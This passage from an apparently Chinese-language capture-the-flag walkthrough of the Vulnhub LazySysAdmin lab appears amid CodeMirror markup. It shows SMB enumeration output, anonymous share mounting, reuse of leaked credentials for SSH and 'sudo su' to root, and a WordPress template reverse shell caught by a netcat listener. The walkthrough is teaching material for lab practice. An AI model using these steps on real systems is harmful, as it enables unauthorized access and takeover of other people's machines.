class="cm-keyword">for</span> workgroup listing.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>Server               Comment</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span><span class="cm-attribute">---------</span>            <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>Workgroup            Master</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span><span class="cm-attribute">---------</span>            <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>WORKGROUP            </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Attempting to map shares on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/print<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="   ">  </span>Mapping</span>: DENIED, Listing: N/A</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/share<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="    ">  </span>Mapping</span>: OK, Listing: OK</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/IPC<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="   ">    </span></span>[E] Can<span class="cm-string">'t understand response:</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">WARNING: The <span class="cm-string">"syslog"</span> option is deprecated</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Password Policy Information <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Attaching to <span class="cm-number">192</span>.168.0.100 using a NULL share</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Trying protocol <span class="cm-number">445</span>/SMB...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Found domain(s):</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] LAZYSYSADMIN</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>[<span class="cm-operator">+</span>] Builtin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Password Info <span class="cm-keyword">for</span> Domain: LAZYSYSADMIN</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>[<span class="cm-operator">+</span>] Minimum password length: <span class="cm-number">5</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Password history length: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Maximum password age: Not Set</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Password Complexity Flags: <span class="cm-number">000000</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Refuse Password Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Store Cleartext: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Lockout Admins: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password No Clear Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password No Anon Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Complex: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] Minimum password age: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] Reset Account Lockout Counter: <span class="cm-number">30</span> minutes </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Locked Account Duration: <span class="cm-number">30</span> minutes </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Account Lockout Threshold: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Forced Log off Time: Not Set</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Retieved partial password policy with rpcclient:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Password Complexity: Disabled</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Minimum Password Length: <span class="cm-number">5</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">===============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Groups on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">===============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting builtin groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting builtin group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting local groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting local group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting domain groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting domain group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">========================================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Users on <span class="cm-number">192</span>.168.0.100 via RID cycling (RIDS: <span class="cm-number">500</span><span class="cm-attribute">-550</span>,1000-1050)    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">========================================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-22-1</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-5-32</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-5-32 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-500 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-544 BUILTIN\Administrators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-545 BUILTIN\Users (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-546 BUILTIN\Guests (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-547 BUILTIN\Power Users (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-548 BUILTIN\Account Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-549 BUILTIN\Server Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-550 BUILTIN\Print Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-1000 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-1001 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-22-1 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-22-1-1000 Unix User\togie (Local User)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-512 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-514 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Getting printer info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">No printers returned.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">enum4linux complete on Thu Feb  <span class="cm-number">1</span> <span class="cm-number">00</span>:46:33 <span class="cm-number">2018</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 4142px;"></div><div class="CodeMirror-gutters" style="display: none; height: 4172px;"></div></div></div></pre><p>windows下获取共享资源</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">net use k: \\<span class="cm-number">192</span>.168.0.100\share<span class="cm-def">$</span></span></pre></div></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 31px;"></div><div class="CodeMirror-gutters" style="display: none; height: 61px;"></div></div></div></pre><p>linux下获取共享资源</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">mount <span class="cm-attribute">-t</span> cifs <span class="cm-attribute">-o</span> <span class="cm-def">username</span><span class="cm-operator">=</span><span class="cm-string">''</span><span class="cm-def">,password</span><span class="cm-operator">=</span><span class="cm-string">''</span> //192.168.0.100/share<span class="cm-def">$ </span>/mnt</span></pre></div></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 31px;"></div><div class="CodeMirror-gutters" style="display: none; height: 61px;"></div></div></div></pre><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/2.png' alt='2' referrerPolicy='no-referrer' /></p><p>发现两个关键的文件deets.txt和wp-config.php</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/3.png' alt='3' referrerPolicy='no-referrer' /></p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/4.png' alt='4' referrerPolicy='no-referrer' /></p><p>尝试用上面获取的mysql账号密码去登录phpmyadmin,但是发现没一个表项可以查看。</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/5.png' alt='5' referrerPolicy='no-referrer' /></p><p>另外,上面还有一个密码是12345,而且之前登录WordPress页面的时候,页面显示<code>My name is togie.</code>,所以可以用账号:<code>togie</code> 密码:<code>12345</code>尝试登录ssh,发现可以成功登录。</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie@LazySysAdmin:~<span class="cm-def">$ whoami</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie@LazySysAdmin:~<span class="cm-def">$ id</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">1000</span>(togie) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">1000</span>(togie) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">1000</span>(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie@LazySysAdmin:~<span class="cm-def">$ sudo</span> <span class="cm-builtin">su</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[sudo] password <span class="cm-keyword">for</span> togie: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@LazySysAdmin:/home/togie<span class="cm-comment"># id</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">0</span>(root) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">0</span>(root) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">0</span>(root)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 215px;"></div><div class="CodeMirror-gutters" style="display: none; height: 245px;"></div></div></div></pre><p>有了root权限,就有权限查看目标文件/root/proof.txt,这样就算完成了整个游戏了。这里刚好togie有root权限,所以尝试直接用sudo su切换到root权限,但是如果togie没有root权限,就需要通过其他方式来提权了。</p><h3><a name='header-n8459' class='md-header-anchor '></a>思路二</h3><p>通过账号:<code>Admin</code> 密码:<code>TogieMYSQL12345^^</code>登录WordPress控制面板,向404.php页面模板插入PHP反弹shell的代码。</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/7.png' alt='7' referrerPolicy='no-referrer' /></p><p>编辑好后,点击下面的upload file应用,然后访问<a href='http://192.168.0.100/wordpress/?p=2' target='_blank' class='url'>http://192.168.0.100/wordpress/?p=2</a></p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@kali:~<span class="cm-comment"># nc -vlp 1234</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">listening on [any] <span class="cm-number">1234</span> ...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">192</span>.168.0.100: inverse host lookup failed: Unknown host</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">connect to [192.168.0.109] from (UNKNOWN) [192.168.0.100] <span class="cm-number">36468</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Linux LazySysAdmin <span class="cm-number">4</span>.4.0-31-generic <span class="cm-comment">#50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-number">16</span>:03:42 up <span class="cm-number">6</span> min,  <span class="cm-number">0</span> users,  load average: <span class="cm-number">0</span>.01, <span class="cm-number">0</span>.15, <span class="cm-number">0</span>.11</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/bin/sh: <span class="cm-number">0</span>: can<span class="cm-string">'t access tty; job control turned off</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ whoami</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">www-data</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ id</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ sudo</span> <span class="cm-builtin">su</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">sudo</span>: no tty present and no askpass program specified</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 376px;"></div><div class="CodeMirror-gutters" style="display: none; height: 406px;"></div></div></div></pre><p>出现no tty present and no askpass program specified,刚好目标机有python环境,使用python派生个新的shell。</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" 